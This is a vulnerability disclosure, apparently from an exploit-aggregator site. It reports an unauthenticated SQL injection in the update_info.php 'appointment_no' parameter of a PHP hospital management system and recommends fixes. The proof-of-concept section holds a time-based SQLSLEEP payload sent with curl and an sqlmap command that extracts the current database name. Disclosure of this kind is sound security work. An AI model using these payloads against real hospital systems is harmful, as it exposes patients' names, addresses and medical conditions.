Share
## https://sploitus.com/exploit?id=42FE06B9-DCF7-51FF-BB86-04BB4798864A
# Vulnerability Report: Unauthenticated SQL Injection in Hospital Management System

## 1. Vulnerability Overview
- **Vulnerability Type**: SQL Injection (CWE-89)
- **Product Name**: Hospital Management System
- **Vendor**: Project Worlds
- **Version**: 1.0 (Latest available on projectworlds.in)
- **Affected Component**: `update_info.php`
- **Vulnerable Parameter**: `appointment_no` (GET parameter)
- **Impact**: Critical (Unauthorized access to sensitive patient records and full database compromise)

---

## 2. Vulnerability Description
A critical SQL injection vulnerability was discovered in the **Hospital Management System (Project Worlds)**. The vulnerability resides in the `update_info.php` script via the `appointment_no` parameter.

The flaw is two-fold:
1.  **Improper Sanitization**: The application relies on a custom `secure()` function in `library.php` which only implements `htmlentities()`. This is insufficient to prevent SQL injection in a numeric context within a SQL query.
2.  **Broken Access Control**: The page attempts to restrict access using a JavaScript-based redirect (`window.location`) in `library.php`. However, the PHP script does not call `exit()` after the redirect, allowing the server to execute the SQL query and return the results even to unauthenticated attackers.

---

## 3. Vulnerability Details
- **File**: `hospital-management-system-in-php-master/update_info.php`
- **Line 32**: Calls `getAllPatientDetail($appointment_no)` where `$appointment_no` is sourced directly from `$_GET['appointment_no']`.
- **Root Cause (library.php)**:
```php
function getAllPatientDetail($appointment_no)
{
    global $connection;
    // Unsafe concatenation and insufficient sanitization
    return $connection->query("SELECT appointment_no, full_name, dob, weight, phone_no, address, medical_condition FROM patient_info, appointments where appointment_no=$appointment_no AND patient_info.patient_id = appointments.patient_id;");
}
```

---

## 4. Proof of Concept (PoC)
An attacker can verify the vulnerability using a time-based SQL injection payload. No authentication is required.

### Verification using `curl`:
```bash
# This payload will cause the server to sleep for 5 seconds
curl -i "http://localhost:9321/update_info.php?appointment_no=1%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)"
```

### Verification using `sqlmap`:
```bash
sqlmap -u "http://localhost:9321/update_info.php?appointment_no=1" --batch --dbms=mysql --time-sec=5 --current-db
```


---

## 5. Impact Analysis
- **Data Confidentiality**: An attacker can extract all patient data, including names, phone numbers, addresses, and medical conditions.
- **Data Integrity**: Combined with other flaws in `library.php`, an attacker could potentially modify or delete hospital records.
- **Unauthorized Access**: The broken access control allows any remote user on the internet to exploit this vulnerability without a valid account.

---

## 6. Recommended Mitigation
1.  **Use Prepared Statements**: Replace string concatenation in `library.php` with parameterized queries using `mysqli_prepare` and `mysqli_stmt_bind_param`.
2.  **Server-Side Access Control**: Update the security functions in `library.php` to use `header("Location: ...")` followed immediately by `exit();` to ensure script execution stops when a user is not authorized.
3.  **Input Validation**: Explicitly cast the `appointment_no` parameter to an integer: `$appointment_no = (int)$_GET['appointment_no'];`.

---

## 7. References
- **Project URL**: https://projectworlds.in/php-projects/hospital-management-system-in-php/
- **CWE-89**: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
"# CVE"